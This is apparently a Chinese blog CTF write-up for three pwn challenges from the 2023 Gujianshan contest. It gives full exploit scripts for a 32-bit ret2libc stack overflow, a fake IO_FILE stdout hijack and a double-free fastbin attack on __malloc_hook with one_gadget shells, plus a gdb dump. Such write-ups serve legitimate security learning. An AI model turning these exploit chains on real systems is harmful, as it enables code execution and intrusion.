2023古剑山pwn题wp | lmarch2'blog

发布日期: 2024-02-06

文章字数: 777

阅读时长: 4 分

阅读次数:

博客终于搭好啦，补一下这学期打的比赛做的题目的wp，好多都只做了题没写题解（以后得养成好习惯）

choice

覆盖可写入字数为\xff实现栈溢出，32位的ret2libc直接打
（And mark一下打不通的时候想想是不是sl和sd没搞清）

覆盖可写入字数为\xff实现``栈溢出``，32位的ret2libc直接打
（And mark一下打不通的时候想想是不是``sl``和``sd``没搞清）
from Excalibur import*

contextset(32)
proc('./choice')
#remo('39.108.173.13:35234')
el('./choice')
lib('./libc-2.23.so')
puts_plt = plt('puts')
puts_got = got('puts')
stdout = 0x0804A044
fflush_plt = plt('fflush')
#back = 0x0804857B
back = 0x080485BB

debug('b *0x8048727\n')
sda(b' name:',b'\x00'*20+b'\xff')
sda(b'now',b'1')

pay = b'a'*(0x1c+4)+p32(puts_plt)+p32(back)+p32(puts_got)
#pay = b'a'*(0x1c+4)+p32(puts_plt)+p32(fflush_plt)+p32(puts_got)+p32(stdout)
sda(b'it?',pay)
real_addr = get_addr32()
prh(real_addr)

sda(b' name:',b'\x00'*20+b'\xff')
sda(b'now',b'1')
binsh,system = searchlibc('puts',real_addr,1)
pay2 =  b'a'*(0x1c+4)+p32(system)+b'aaaa'+p32(binsh)
sda(b'it?',pay2)

ia()

bss2019

给gift得到程序基地址，泄露stdout得到libc，bss超长长度溢出，然后开始懵逼
可以构造伪造fake_io_file，stdout指过来执行
参考链接
IO_FILE学习
 Pwn_IO_FILE.md
[古剑山2023] pwn

给gift得到程序基地址，泄露``stdout``得到libc，bss超长长度溢出，然后开始懵逼
可以构造伪造fake_io_file，``stdout``指过来执行
参考链接
IO_FILE学习 
Pwn_IO_FILE.md
[古剑山2023] pwn
0x5558fce02020 <stdout>:        0x00007f4208bc7620      0x0000000000000000
0x5558fce02030 <stdin>: 0x00007f4208bc68e0      0x0000000000000000
0x5558fce02040 <stderr>:        0x00007f4208bc7540      0x0000000000000000
0x5558fce02050: 0x000000003b687320      0x0000000000000000
0x5558fce02060: 0x0000000000000000      0x0000000000000000
0x5558fce02070: 0x0000000000000000      0x0000000000000001
0x5558fce02080: 0x0000000000000000      0x0000000000000000
0x5558fce02090: 0x0000000000000000      0x0000000000000000
0x5558fce020a0: 0x0000000000000000      0x0000000000000000
0x5558fce020b0: 0x0000000000000000      0x0000000000000000
0x5558fce020c0: 0x0000000000000000      0x0000000000000000
0x5558fce020d0: 0x0000000000000000      0x00005558fce02200
0x5558fce020e0: 0x0000000000000000      0x0000000000000000
0x5558fce020f0: 0x0000000000000000      0x0000000000000000
0x5558fce02100: 0x0000000000000000      0x0000000000000000
0x5558fce02110: 0x0000000000000000      0x0000000000000000
0x5558fce02120: 0x0000000000000000      0x00005558fce02128
0x5558fce02130: 0x0000000000000000      0x0000000000000000
0x5558fce02140: 0x0000000000000000      0x0000000000000000
0x5558fce02150: 0x0000000000000000      0x0000000000000000

from Excalibur import*

contextset()
proc('./pwn')

def read(off,size,data):
    sla(b'Choice:',b'2')
    sla(b'Offset:',off)
    sla(b'Size:',size)
    sla(b'data:',data)

def write(off):
    sla(b'Choice:',b'1')
    sla(b'Offset:',off)

el('./pwn')
puts_got = got('puts')

ru(b'0x')    
base = int(ru(b'\n'),16)-0x202060
prh(base)

debug('b *$rebase(0xAAA)\nb *$rebase(0xB60)\n')
write(b'-64')
real_addr = get_addr64()
lib('./libc-2.23.so')
offset = libcsym('_IO_2_1_stdout_')
libcbase = real_addr - offset
binsh,system = searchlibc('_IO_2_1_stdout_',real_addr,1)

io_file  = b' sh;'+p32(0) + p64(0)*4 + p64(1)
io_file  = io_file.ljust(0x88,b'\x00') + p64(base + 0x202200)
io_file  = io_file.ljust(0xd8,b'\x00') + p64(base + 0x202050 + 0xd8)  #ptr->self
io_file += b'\x00'*0x30 + p64(system)
read(b'-16',b'-1',io_file)
read(b'-64',b'8',p64(base +0x202050))

ia()

Uafnote

Double free 打fast bin attack

from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')
libset('./libc-2.23.so')
rsetup('39.108.173.13',30676)

def add(size,data):
    sla('>',b'1')
    sla(':',str(size))
    sla(':',data)

def free(idx):
    sla('>',b'2')
    sla(':',str(idx))

def show(idx):
    sla('>',b'3')
    sla(':',str(idx))

def edit(idx,size,content):
    sla('>',b'4')
    sla(':',str(idx))
    sla(':',str(size))
    sla(':',content)

add(0x80,b'6')
add(0x68,b'target1')
add(0x68,b'a'*0x20)
add(0x68,b'target2')
add(0x68,b'/bin/sh\x00')
evgdb()
free(0)
show(0)
libc = getx64(0,-1)-0x3c4b78
dpx('libc',libc)
free(1)
free(3)
free(1)

hook = symoff('__malloc_hook',libc)-0x23
add(0x68,p64(hook))
add(0x68,p64(hook))
add(0x68,p64(hook))
og = [0x45226,0x4527a,0xf03a4,0xf1247,0xef6c4,0xf0567]
sys = libc+ og[3]#one_shot
#sys = symoff('system',libc)

add(0x68,b'a'*(0x23-0x10)+p64(sys))
#add(0x68,b'/bin/sh\x00')

sla(b">> ", b'1')
sla(b"size:", b'8')
ia()

"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
      rax == NULL

      0x4527a execve("/bin/sh", rsp+0x30, environ)
      constraints:
            [rsp+0x30] == NULL

            0xf03a4 execve("/bin/sh", rsp+0x50, environ)
            constraints:
                  [rsp+0x50] == NULL

                  0xf1247 execve("/bin/sh", rsp+0x70, environ)
                  constraints:
                        [rsp+0x70] == NULL
"""